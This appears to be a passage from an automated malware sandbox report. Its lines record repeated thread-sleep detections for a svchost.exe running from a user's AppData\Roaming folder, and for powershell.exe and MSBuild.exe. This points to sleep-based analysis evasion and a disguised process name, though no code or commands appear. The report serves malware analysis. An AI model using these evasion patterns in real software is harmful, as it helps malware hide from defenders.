                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -83266s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -83078s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -82945s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -82818s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -82641s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -82453s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -82277s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -82094s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -81920s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -81781s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -81617s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -81469s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -81340s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -81000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -80819s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -80609s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -80428s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -80234s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -79797s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -79094s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -77266s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -76985s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -76766s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -76572s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -76328s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -76106s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -75719s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -75500s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -75281s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -75150s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -75000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -74839s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -74729s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -74578s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -74422s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -74263s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -74125s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -73994s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -73844s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -73541s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -73344s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -73184s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -73000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -72838s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -72547s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -71781s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -71313s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -71152s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -70922s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -70700s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -70516s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -70297s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -70110s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -69891s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -69719s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -69585s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -69434s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -68594s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -68344s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -68139s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 24004Thread sleep time: -67983s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 54924Thread sleep time: -14757395258967632s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 48136Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640Thread sleep time: -8301034833169293s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640Thread sleep time: -100000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62680Thread sleep count: 501 > 30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640Thread sleep time: -99840s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640Thread sleep time: -99716s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640Thread sleep time: -99547s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640Thread sleep time: -99344s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640Thread sleep time: -99210s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640Thread sleep time: -99016s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640Thread sleep time: -98828s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640Thread sleep time: -98693s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640Thread sleep time: -98563s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640Thread sleep time: -98391s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640Thread sleep time: -98224s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640Thread sleep time: -98000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640Thread sleep time: -97828s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640Thread sleep time: -97485s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640Thread sleep time: -97328s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640Thread sleep time: -97157s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640Thread sleep time: -96953s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640Thread sleep time: -96823s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640Thread sleep time: -96610s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640Thread sleep time: -96407s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640Thread sleep time: -96250s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640Thread sleep time: -96078s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640Thread sleep time: -95860s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640Thread sleep time: -95625s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 62640Thread sleep time: -95391s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -6456360425798339s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -100000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64404Thread sleep count: 1452 > 30
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -99803s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -99641s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -99512s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -99377s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -99194s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -99024s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -98755s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -98602s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -98478s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -98187s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -98042s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -97910s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -97719s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -97516s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -97359s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -97211s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -96984s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -96848s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -96562s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -96383s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -95734s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -95328s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -95172s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -95027s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -94906s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -94764s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -94187s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -94024s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -93859s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -93687s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -93562s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -93422s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -93307s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -93137s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -92975s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -92851s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -92607s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -92460s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -92292s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -92131s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -91935s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -91784s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -91632s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -91490s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -91356s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -91172s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -90973s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -90765s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -90593s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -90443s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -90156s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -89640s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -87625s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -87218s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -86890s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -86687s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -86500s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -86343s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -86140s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -85812s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -85668s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -85328s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -85152s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -85025s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -84904s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -84768s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -84515s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -84356s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -84218s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -84044s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -83919s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -83625s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -83509s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -83343s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -83230s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -83078s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -82936s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -82806s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -82578s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -82437s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -82265s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -82095s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -81828s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -81547s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -81156s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -80953s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -80725s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -80578s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -80434s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -80234s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -80066s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -79890s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -79672s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -79487s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -78672s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -78422s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -78257s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -78120s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -77967s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -77781s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -77633s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -77482s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -77266s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -77063s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -76941s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -76750s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -76576s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -76391s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -76172s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -75875s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -75609s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -75359s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -75076s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -74750s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -74563s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -74374s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -74047s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -73719s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -73514s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -73281s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -73031s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -72777s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -72516s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -72188s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -71625s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -70000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -69748s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -69453s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -69156s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -68867s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -68469s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -68141s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -67922s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -67700s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -67469s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -67219s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -66969s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -66752s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -66586s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -66359s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -66190s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -66109s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -65875s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -65669s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -65490s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -65203s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -64875s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -64562s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -64312s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -64146s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -63953s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -63797s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -63375s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -63062s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -62859s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -62562s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -62219s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -61974s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -61745s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -61542s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -61359s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -61172s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -60999s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -60814s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -60645s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -60484s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -60322s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -60156s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -59984s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -59774s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -59562s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -59382s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -59203s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -59016s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -58828s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -58500s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -58312s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -58125s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -57937s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -57734s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -57516s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -57297s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -57109s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -56891s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -56672s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -56523s >= -30000s
                Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 64360Thread sleep time: -56311s >= -30000s
